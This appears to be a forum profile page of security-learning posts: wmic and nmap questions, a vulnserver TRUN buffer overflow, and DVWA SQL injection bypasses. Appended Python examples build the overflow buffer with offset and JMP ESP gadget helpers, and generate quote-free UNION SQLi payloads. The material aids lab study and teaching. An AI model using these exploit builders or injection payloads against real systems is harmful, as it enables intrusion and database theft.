w01f

Active Members
Posts: 11

w01f's Achievements

  1. Here is standard wmic output from cmd or PowerShell. The output of wmic can be redirected as follows from cmd or PowerShell:

         C:\tmp>wmic /output:out.txt printer list status
         C:\tmp>

     My question: let's say cmd and PowerShell are not available (blocked for security purposes). Is it possible to perform similar redirection from wmic itself (not from cmd or PowerShell)?
  2. Is it possible to save the output of a UDP scan (-sU) in the three major formats at once? I don't have any issue with the TCP scan.

         $ nmap scanme.nmap.org -oA tcp
         Starting Nmap 7.91 ( https://nmap.org )
         Nmap scan report for scanme.nmap.org (45.33.32.156)
         Host is up (0.19s latency).
         Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe00:bb2f
         Not shown: 995 closed ports
         PORT      STATE    SERVICE
         22/tcp    open     ssh
         25/tcp    filtered smtp
         80/tcp    open     http
         9929/tcp  open     nping-echo
         31337/tcp open     Elite
         Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
         $

     However, it doesn't work well with a UDP scan.

         $ nmap -sU scanme.nmap.org -oA udp
         You requested a scan type which requires root privileges.
         QUITTING!
         $
         $ sudo nmap -sU scanme.nmap.org -oA udp
         Failed to open normal output file udp.nmap for writing
         QUITTING!
         $
         $ ls -lh
         total 16K
         -rw-rw-r-- 1 wolf wolf  441 Jul  6 00:20 tcp.gnmap
         -rw-rw-r-- 1 wolf wolf  541 Jul  6 00:20 tcp.nmap
         -rw-rw-r-- 1 wolf wolf 5.9K Jul  6 00:20 tcp.xml
         $

     The only output files generated were for the TCP scan. What about the UDP scan? Is it possible to use -sU with -oA?
  3. I've just installed Apache with PHP-FPM based on the following tutorial: How to Setup Apache with PHP-FPM on Ubuntu 20.04

         wolf@linux:~$ dpkg -l apache2 libapache2-mod-fcgid software-properties-common php7.4 php7.4-fpm
         Desired=Unknown/Install/Remove/Purge/Hold
         | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
         |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
         ||/ Name                        Version              Architecture  Description
         +++-===========================-====================-=============-===============================================================
         ii  apache2                     2.4.29-1ubuntu4.14   amd64         Apache HTTP Server
         ii  libapache2-mod-fcgid        1:2.3.9-1            amd64         FastCGI interface module for Apache 2
         ii  php7.4                      7.4.12-3+ubuntu18.0  all           server-side, HTML-embedded scripting language (metapackage)
         ii  php7.4-fpm                  7.4.12-3+ubuntu18.0  amd64         server-side, HTML-embedded scripting language (FPM-CGI binary)
         ii  software-properties-common  0.96.24.32.14        all           manage the repositories that you install software from (common)
         wolf@linux:~$

     Test PHP with the phpinfo() function:

         wolf@linux:/var/www/html$ cat info.php
         <?php phpinfo(); ?>
         wolf@linux:/var/www/html$

     The only issue right now is that the PHP file seems to be processed properly in the CLI, but not via the web browser.

         wolf@linux:/var/www/html$ php info.php | head
         phpinfo()
         PHP Version => 7.4.12

         System => Linux 4.15.0-122-generic #124-Ubuntu SMP Thu Oct 15 13:03:05 UTC 2020 x86_64
         Build Date => Oct 31 2020 17:04:09
         Server API => Command Line Interface
         Virtual Directory Support => disabled
         Configuration File (php.ini) Path => /etc/php/7.4/cli
         Loaded Configuration File => /etc/php/7.4/cli/php.ini
         Scan this dir for additional .ini files => /etc/php/7.4/cli/conf.d
         wolf@linux:/var/www/html$

     Unfortunately, it's not working in the web browser. What is wrong in this case, and what should I do to troubleshoot it?
  4. This tutorial shows how to find a JMP ESP in ntdll.dll: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/

         Find address for EIP

         In this step we have to check the registers and the stack. We have to find a way to jump to our buffer to execute our code. ESP points to the beginning of the C part of our buffer. We have to find a JMP ESP or CALL ESP instruction. Do not forget that the address must not contain bad characters!

         Open the executable modules list in OllyDbg (press the E letter on the toolbar). Select a module, for example ntdll.dll. (Vulnserv would not be a good choice as its address contains zero!) Right-click on the code and select Search for/All commands. Enter JMP ESP. A couple of possible addresses are displayed. Select one.

     I've followed the steps but still couldn't find the JMP ESP instruction in ntdll.dll. JMP ESP is not there.
  5. Ah, I got it now. Thanks for helping as always. It doesn't matter, as that's the number of C chars that come after the EIP address that was found.

         "C" * (5060 - 2003 - 4)

     Any number would do, right? E.g. "C" * 8

         buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + "C" * 8
  6. https://github.com/stephenbradshaw/vulnserver

     In this tutorial, sh3llc0d3r created 5040 bytes of data using Metasploit's pattern_create.rb: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/

         /usr/share/metasploit-framework/tools/pattern_create.rb 5040

     But in the following Python script, he/she uses 5060 instead of 5040.

         buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + "C" * (5060 - 2003 - 4)

     What happens to the additional 20 bytes of data? Where did they come from?
  7. How do I modify the original post? I can't find an "Edit" button on this page. Thanks.
  8. I'll use DVWA in this example as the code is available to everyone.

     Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment. You can get it here and set it up in your personal lab: http://www.dvwa.co.uk/

     Now I know that it's not possible to use a tick/quote in SQL Injection Medium Level due to the "mysql_real_escape_string()" PHP function.

         mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
         https://www.php.net/manual/en/function.mysql-real-escape-string.php

     That's fine. I solved the Medium level without using a quote. It's easy because the amount of data in DVWA is limited. But what happens when there's bigger data? Let me give an example.

     I was able to enumerate ALL column names from the current database. The problem is I wanted to get only the columns from the table "users". As you can see, the following command actually lists all columns from ALL tables, including "users" and also "guestbook":

         1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE()-- -

     This is how it looks when I select "table_schema,table_name,column_name" in MySQL.

         mysql> SELECT table_schema,table_name,column_name FROM information_schema.columns WHERE table_schema=DATABASE();
         +--------------+------------+-------------+
         | table_schema | table_name | column_name |
         +--------------+------------+-------------+
         | dvwa         | guestbook  | comment_id  |
         | dvwa         | guestbook  | comment     |
         | dvwa         | guestbook  | name        |
         | dvwa         | users      | user_id     |
         | dvwa         | users      | first_name  |
         | dvwa         | users      | last_name   |
         | dvwa         | users      | user        |
         | dvwa         | users      | password    |
         | dvwa         | users      | avatar      |
         +--------------+------------+-------------+
         9 rows in set (0.00 sec)

     The only solution that I can think of at the moment is limiting the output to the "users" table by using MySQL's WHERE and AND clauses. However, the tick is not allowed by the "mysql_real_escape_string" function, and this code will cause an error.

         1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='users'-- -

     Error (which is expected because of the quote):

         You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\'-- -' at line 1

     Is there a way to get around this? How do I use a tick when it's not possible?
  9. I really appreciate your invaluable response and feedback. I learned a lot just by reading the tips given.

     I notice that every time ' is used in the medium level, it has been escaped with \

     Code:  '
     Error: ... near '\'' at line 1

     Code:  ' OR 1=1 -- -
     Error: ... near '\' OR 1=1 -- -' at line 1

     Code:  ' OR '1'='1' -- -
     Error: ... near '\' OR \'1\'=\'1\' -- -' at line 1

     I've looked at the source and found that this was caused by the PHP function "mysql_real_escape_string", in an attempt to mitigate SQLi.

     Medium level code, protected by "mysql_real_escape_string":

         $id = $_GET['id'];
         $id = mysql_real_escape_string($id);
         $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";

     While in the low level, there is no protection at all. So, it's easy to break the query, manipulate it, and disable the rest of the query with a comment.

         $id = $_GET['id'];
         $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

     The first question has been answered; I've got more. I'll be back with more questions :)

     So I guess for this kind of environment, I have to test more and observe the error messages carefully, as every single error tells a different story. The important part is to "use the error to visualize the statement being used". Thanks again for the invaluable tips.
  10. Thanks for your response. Btw, this problem has been solved by trial and error. A tick is not even required in the Medium level.

      I was wondering how to determine whether a tick is needed or not in the injection. Initially, I thought it was required for strings and not for integers, based on this presentation at Def Con (refer to slide 23): https://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf

      Apparently DVWA shows that it's not accurate to determine whether a tick is required based on integer/string-based injection.

      Without tick: 1 ORDER BY 10 -- -

      Low:
          ID: 1 ORDER BY 10 -- -
          First name: admin
          Surname: admin

      Medium:
          Unknown column '10' in 'order clause'

      With tick: 1' ORDER BY 10 -- -

      Low:
          Unknown column '10' in 'order clause'

      Medium:
          You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY 10 -- -' at line 1
  11. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment. You can get it here and set it up in your personal lab: http://www.dvwa.co.uk/

      As usual, ' is used to test for SQLi vulnerabilities.

      DVWA Low Level Security
      DVWA Medium Level Security

      Both are vulnerable to SQLi, but the error messages from these 2 levels are different.

      So, I tried it with and it works for the Low level, but not on the Medium level. I notice that every time ' is used on the Medium level, it will be escaped with \

      Then, I decided to use a different trick to bypass this, which is %27. 27 is the hex value of a single quote '. ' is replaced with %27 so it becomes

      Unfortunately, this trick won't work on the Low Level (no error at all), and here is the error on the Medium level:

          You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY 10 -- -' at line 1

      Since this is a GET request, the request can be seen in the address bar. Interestingly, %27 has been encoded by the browser again, so it becomes %2527. 25 is the hex value for %. So this won't work.

      I had no idea at that point, so I googled more and found a trick using the unhex() function. With this, I was able to use ORDER BY. But this only works on Medium, not the Low level.

      I thought the problem was solved. But when I try to use it with different SQL syntax such as table_schema='dvwa', I'm getting the same error, which is expected.

      Error

      Since the unhex() trick worked before, I thought it would work on this too.

      Error

      Little did I know... I need to separate the second unhex(27) function from the database name, which is dvwa. Else, SQL will read it as "dvwaunhex(27)-- -"

      I'm stuck here. How do I solve this problem?
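Added example for post 2 (nmap -sU with -oA). This is not code from the post: it shows what the three -oA files are named and how tooling consumes the XML one, merging a TCP and a UDP scan of the same host into a single table. Nothing on the page explains why root could not write udp.nmap in the post's directory, so that is not diagnosed here. The two XML documents are constructed by hand to mimic the shape of Nmap's -oX output for scanme.nmap.org; they are not captured scan results.

```python
"""Merge TCP and UDP Nmap XML (-oX / the .xml file from -oA) into one port table.

Added example; the XML below is constructed to look like Nmap output, not real results.
"""
import xml.etree.ElementTree as ET

TCP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap scanme.nmap.org -oA tcp">
  <host>
    <address addr="45.33.32.156" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="25"><state state="filtered"/><service name="smtp"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports>
  </host>
</nmaprun>"""

UDP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sU scanme.nmap.org -oA udp">
  <host>
    <address addr="45.33.32.156" addrtype="ipv4"/>
    <ports>
      <port protocol="udp" portid="53"><state state="open|filtered"/><service name="domain"/></port>
      <port protocol="udp" portid="123"><state state="open"/><service name="ntp"/></port>
    </ports>
  </host>
</nmaprun>"""


def oa_paths(prefix):
    """The three files that `-oA <prefix>` writes: normal, grepable and XML output."""
    return [f"{prefix}.{ext}" for ext in ("nmap", "gnmap", "xml")]


def parse_ports(xml_text):
    """Yield (addr, proto, port, state, service) for every port element in one scan."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for p in host.iter("port"):
            svc = p.find("service")
            yield (addr, p.get("protocol"), int(p.get("portid")),
                   p.find("state").get("state"),
                   svc.get("name") if svc is not None else "")


def merge_scans(*xml_docs):
    """Key results on (addr, proto, port) so a TCP and a UDP scan never collide;
    a later document overwrites an earlier one for the same key."""
    merged = {}
    for doc in xml_docs:
        for addr, proto, port, state, svc in parse_ports(doc):
            merged[(addr, proto, port)] = (state, svc)
    return merged


def open_ports(merged):
    """Ports worth following up: 'open', plus UDP's ambiguous 'open|filtered'."""
    return sorted(k for k, (state, _) in merged.items() if state.startswith("open"))


if __name__ == "__main__":
    result = merge_scans(TCP_XML, UDP_XML)
    for (addr, proto, port), (state, svc) in sorted(result.items()):
        print(f"{addr} {port}/{proto} {state} {svc}")
```

With real files you would read `tcp.xml` and `udp.xml` from disk and pass their contents to `merge_scans`; keying on the protocol is what makes it safe to combine a -sS and a -sU scan that both report port 53.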
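Added example for posts 4, 5 and 6 (the vulnserver TRUN overflow). This is not the tutorial's or the poster's code. It reimplements the Metasploit pattern_create / pattern_offset algorithm so the 2003-byte offset can be reproduced, searches a module's raw bytes for JMP ESP, CALL ESP and PUSH ESP; RET while rejecting any address that contains a bad character (the reason the tutorial says not to use vulnserver's own module), and assembles the post's buffer layout to show that the trailing "C" count is just whatever is left of the total, which is why 5040 versus 5060 makes no difference to the crash. The EIP value 0x386F4337 is an assumption chosen because it lands at offset 2003 in the cyclic pattern; the module bytes and base address are constructed for the demo and are not ntdll.dll.

```python
"""Offset, gadget and buffer helpers for the vulnserver TRUN overflow (added example).

Python 3 / bytes, unlike the Python 2 str script in the post. All module data is constructed.
"""
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...Ab0... exactly as Metasploit's pattern_create.rb builds it."""
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out.append(u + l + d)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip_hex):
    """Offset of the bytes that ended up in EIP. EIP is little-endian, so the register
    value is reversed into the text that sat in the buffer (0x386F4337 -> '7Co8')."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("ascii")
    return pattern.find(needle)


# Opcode bytes for instructions that redirect execution to ESP.
GADGETS = {b"\xff\xe4": "jmp esp", b"\xff\xd4": "call esp", b"\x54\xc3": "push esp; ret"}


def find_esp_gadgets(module_bytes, base, badchars=b"\x00"):
    """Every ESP gadget in the module whose address has no bad character in any byte.
    A raw byte search also finds FF E4 sequences hiding inside other instructions,
    which an instruction-level search in a debugger can miss."""
    hits = []
    for opcode, name in GADGETS.items():
        i = module_bytes.find(opcode)
        while i != -1:
            addr = base + i
            if not any(b in badchars for b in struct.pack("<I", addr)):
                hits.append((addr, name))
            i = module_bytes.find(opcode, i + 1)
    return sorted(hits)


def build_trun(offset, ret_addr, total=5060, badchars=b"\x00"):
    """Post's layout: 'TRUN /.:/' + 'A'*offset + little-endian EIP + 'C' filler.
    The filler length is whatever remains of `total`; it only has to exist so that
    ESP points into attacker-controlled bytes after the return."""
    eip = struct.pack("<I", ret_addr)
    if any(b in badchars for b in eip):
        raise ValueError("return address contains a bad character")
    return b"TRUN /.:/" + b"A" * offset + eip + b"C" * (total - offset - 4)


# Constructed 64-byte "module": JMP ESP at +0x10 and CALL ESP at +0x20, NOPs elsewhere.
DEMO_BASE = 0x77A21000  # assumption for the demo, not a real ntdll base
DEMO_MODULE = (b"\x90" * 0x10 + b"\xff\xe4"
               + b"\x90" * 0x0e + b"\xff\xd4"
               + b"\x90" * 0x1e)

if __name__ == "__main__":
    pat = pattern_create(5040)
    off = pattern_offset(pat, "386F4337")
    print("offset:", off)
    for addr, name in find_esp_gadgets(DEMO_MODULE, DEMO_BASE):
        print(f"0x{addr:08x}  {name}")
    print("buffer length:", len(build_trun(off, DEMO_BASE + 0x10)))
```

The bad-character check is on the address bytes, not on the gadget: a JMP ESP at 0x00401010 is useless for this bug because the null byte would terminate the string copy before EIP is fully overwritten, which is the tutorial's point about vulnserver's own module.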
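Added example for posts 8 to 11 (DVWA SQLi, Medium level). This is not DVWA's code and not the poster's. It models mysql_real_escape_string() in Python using the character list quoted in post 8, reproduces the two query templates shown in post 9 so the differing Low/Medium behaviour from post 10 can be seen, and builds the post-8 UNION payload restricted to one table without any tick: MySQL accepts a hex literal (0x7573657273) or CHAR(117,115,101,114,115) wherever a string 'users' would go, so there is no unhex() concatenation to get wrong, which is where post 11 got stuck. It only builds strings; it does not connect to a database.

```python
"""Quote-free string literals for an escaped MySQL injection point (added example).

mysql_real_escape_string is modelled from the PHP manual text quoted in post 8.
"""

# Characters the escaping function rewrites, and what MySQL's C API emits for each.
ESCAPED = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
           "'": "\\'", '"': '\\"', "\x1a": "\\Z"}


def mysql_real_escape_string(s):
    """Python model of the escaping applied to $id at DVWA Medium level."""
    return "".join(ESCAPED.get(c, c) for c in s)


def hex_literal(s):
    """MySQL 0x... literal; in a string comparison it equals the string itself."""
    return "0x" + s.encode().hex()


def char_literal(s):
    """MySQL CHAR(...) form, also free of quotes and backslashes."""
    return "CHAR(" + ",".join(str(b) for b in s.encode()) + ")"


def dvwa_query(level, user_input):
    """The two templates from post 9: Low interpolates inside quotes with no escaping,
    Medium escapes but interpolates bare, so a tick is never needed there."""
    base = "SELECT first_name, last_name FROM users WHERE user_id = "
    if level == "low":
        return base + f"'{user_input}'"
    if level == "medium":
        return base + mysql_real_escape_string(user_input)
    raise ValueError(f"unknown level: {level}")


def columns_of_table(table, encoder=hex_literal):
    """Post 8's UNION payload limited to one table, without a single tick."""
    return ("1 UNION SELECT NULL,column_name FROM information_schema.columns "
            f"WHERE table_schema=DATABASE() AND table_name={encoder(table)}-- -")


def payload_survives(user_input):
    """True when escaping leaves the payload byte-for-byte unchanged."""
    return mysql_real_escape_string(user_input) == user_input


if __name__ == "__main__":
    for probe in ("1 ORDER BY 10 -- -", "1' ORDER BY 10 -- -"):
        for level in ("low", "medium"):
            print(f"{level:6} {dvwa_query(level, probe)}")
    print(columns_of_table("users"))
    print(columns_of_table("users", char_literal))
    print("table_schema=" + hex_literal("dvwa"))
```

Running the two probes through `dvwa_query` shows why post 10's results look inverted: at Low, the tick-less payload is swallowed inside the `'...'` literal and the query stays valid, while at Medium the same bytes land bare in the statement and ORDER BY runs; add the tick and the roles swap.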